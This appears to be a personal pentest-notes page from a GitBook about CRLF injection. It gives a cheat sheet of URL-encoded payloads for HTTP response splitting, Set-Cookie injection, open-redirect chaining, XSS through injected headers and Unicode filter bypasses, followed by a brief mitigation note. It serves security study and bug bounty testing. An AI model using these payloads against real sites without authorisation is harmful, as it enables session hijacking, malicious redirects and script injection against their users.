sec-notes
  • Whoami
  • WEP-Pen
    • Reconnaissance
    • Enumeration
    • OWSAP TOP 10
      • Cryptographic Failures
        • Weak Encoding for Password
        • Improper Following of a Certificate's Chain of Trust
          • Understanding Digital Certificates : Self-Signed and CA-Signed Certificate **
          • Transport Layer Security (TLS) and SSL **
        • Clear Text Transmission Of Sensitive Data
          • SSLStripping **
      • Broken Access Control
        • Path Traversal
        • Sensitive Cookie with Improper SameSite Attribute
        • Link Following
        • Incorrect Default Permissions
        • Information disclosure
        • CSRF
          • csrf checklist
        • 403 bypass
        • Exposure of WSDL File Containing Sensitive Information
        • bussiness logic checklist
        • 2FA bypass checklist
        • admin panal checklist
        • idor checklist
        • Authentication checklist
        • reset_password_checklist
        • ATO
      • Injection
        • Cross Site Scripting
          • Cross Site Scripting
          • Exploitation
          • Protections
        • SQL Injection
          • SQL Injection Overview
        • NoSQL Injection
        • CRLF Injection
        • XML Injection
      • Insecure Design
      • Security Misconfiguration
        • CORS Miscofigration
        • Mail Server Misconfiguration
      • Vulnerable and Outdated Components
      • Identification and Authentication Failures
      • Software and Data Integrity Failures
      • Security Logging and Monitoring Failures
      • Server-Side Request Forgery (SSRF)
    • Checklists
      • mass assignment
      • aem misconfiguration
      • exif_geo
      • xss
      • Session Management
      • Authorization
      • cookie
      • Django
      • Symfony
      • json
      • bypass rate limit
      • Rce
      • Register Page
    • JWT Hacking
    • GraphQL Vulnerabilities
    • PostMessage Vulnerabilities
      • PostMessage Vulnerabilities
      • Blocking main page to steal postmessage
      • Bypassing SOP with Iframes - part 1
      • Bypassing SOP with Iframes - part 2
      • Steal postmessage modifying iframe location
  • API-Pen
    • API Discovry
    • Reverse Engineering API Documentation
    • Excessive Data Exposure
    • Vulnerability Scanning
    • API Authentication Attacks
      • Classic Authentication Attacks
      • API Token Attacks
    • API Authorization Attacks
      • Broken Object Level Authorization (BOLA)
      • Broken Function Level Authorization
    • Improper Assets Management
    • Mass Assignment
    • SSRF
    • Injection Attacks in API
    • Evasive Maneuvers
  • NET-Pen
    • Active Directory Pentesting
      • Active Directory Components
      • Initial Attack Vectors
        • LLMNR Poisoning
        • SMB Relay Attacks
        • IPv6 Attacks ( IPv6 DNS Takeover )
        • Printer Hacking
        • Methodology
        • Some Other Attacks
          • Zerologon (CVE-2020-1472)
          • PrintNightmare (CVE-2021-1675)
      • Post-Compromise Attacks
        • Pass Attacks
        • Kerberoasting Attack
        • Token Impersonation Attack
        • LNK File Attack
        • GPP / cPassword Attacks
        • Mimikatz
        • Methodology
      • We've Compromised the Domain
        • Dumping the NTDS.dit
        • Golden Ticket Attacks
        • Methodology
      • Case Study
      • Password Attacks
    • Attack Vectors by Port
      • FTP 21
      • SSH 22
      • Telnet 23 - 2323
      • SMTP 25
      • DNS 53
      • Kerberos 88
      • POP 110-995
      • RPC 111
      • Ident 113
      • NNTP 119
      • NetBIOS 137-138
      • SMB / Samba 135-139, 445
      • MSRPC 135
      • SNMP 161
      • LDAP 389,636
      • Modbus 502
      • OpenSSL 1337
      • Ms-SQL 1433
      • Oracle Listener 1521 1522 1529
      • NFS 2049
      • MySql 3306
      • RDP 3389
      • ADB Android Debug Bridge 5555
      • WinRM 5985 5986
      • VNC 5800 5900
      • Redis 6379
      • Unreal IRC 6667
      • Tomcat 8080
      • MongoDB 27017
      • http 80
    • Network basics
    • Information Gathering
    • Privilege Escalation
      • Windows Privilege Escalation
      • Linux Privilege Escalation
  • write-ups
    • How i found a Privilege Escalation via Impersonation Features feature
    • How I Bypassed SAML Authentication, Leading to Admin Panel Access.
    • How I was able to discover ATO Via IDOR vulnerability
    • Easy full Account Takeover via Facebook OAuth Misconfiguration
Powered by GitBook
On this page
  • What is CRLF Injection?
  • CHEATSHEET
  • Result And Analysis
  • Mitigation or Fix Implementation
  1. WEP-Pen
  2. OWSAP TOP 10
  3. Injection

CRLF Injection

Getting Started

Now, What is CRLF?

feed = \n (%0a)
Carriage Return = \r (%0d)

Basically, Pressing Enter key is the combination of carriage return & line feed

Windows Editor mostly uses a combination of \r\n Unix uses mostly

Diggin' into Injection and Attack Vector

What is CRLF Injection?

A Carriage Return Line Feed (CRLF) Injection vulnerability occurs when an application does not sanitize user input correctly and allows for the insertion of carriage returns and line feeds, input which for many internet protocols, including HTML, denote line breaks and have special significance. For example, Parsing of HTTP message relies on CRLF characters (%0D%0A which decoded represent \r\n) to identify sections of HTTP messages, including headers. Reference:

The Effect of CRLF injection also includes HTTP Request smuggling and HTTP Response Splitting. ( Detailing about them is out of the scope of this Blog, Maybe will discuss it in next blog post)

As I went through reports and write-ups, I compiled a cheat sheet for CRLF injection, covering different exploitation techniques. This serves as a quick reference for identifying and leveraging CRLF vulnerabilities in web applications.

CHEATSHEET

1. HTTP Response Splitting

HTTP response splitting occurs when an attacker injects CRLF (%0D%0A) into an HTTP response, allowing them to manipulate headers or inject new ones.

/%0D%0ASet-Cookie:mycookie=myvalue

This injects a Set-Cookie header, which can be exploited for session fixation or altering user sessions.

2. CRLF Chained with Open Redirect

By combining CRLF injection with an open redirect vulnerability, attackers can manipulate response headers and force users to malicious destinations.

//www.google.com/%2F%2E%2E%0D%0AHeader-Test:test2
/www.google.com/%2E%2E%2F%0D%0AHeader-Test:test2
/google.com/%2F..%0D%0AHeader-Test:test2
/%0d%0aLocation:%20http://example.com

These payloads manipulate the Location header, forcing a redirection to an attacker-controlled site.

3. CRLF Injection Leading to XSS

CRLF injection can also be used to execute Cross-Site Scripting (XSS) attacks by injecting headers like Content-Type and disabling security protections.

/%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23
/%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a<script>alert(document.domain)</script>

The first payload disables X-XSS-Protection, while the second injects a malicious script, leading to XSS execution.

4. Filter Bypass Techniques

Some applications implement filters to prevent CRLF injection, but attackers can bypass these protections using encoded characters.

Bypass Encoding:

%E5%98%8A = %0A = \u560a
%E5%98%8D = %0D = \u560d
%E5%98%BE = %3E = \u563e (>)
%E5%98%BC = %3C = \u563c (<)

Example Payload:

%E5%98%8A%E5%98%8DSet-Cookie:%20test

These Unicode-encoded sequences bypass input validation and inject malicious headers.

Result And Analysis

Most of the CRLF injection can lead to XSS and Open Redirects if chained properly which increases the Criticality of the report and you can escalate your report to Medium CVS score easily

Mitigation or Fix Implementation

A simple solution for CRLF Injection is to sanitize the CRLF characters before passing into the header or to encode the data which will prevent the CRLF sequences from entering the header.

Payloads

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/CRLF%20Injection

https://github.com/cujanovic/CRLF-Injection-Payloads/blob/master/CRLF-payloads.txt

PreviousNoSQL InjectionNextXML Injection

Last updated 19 days ago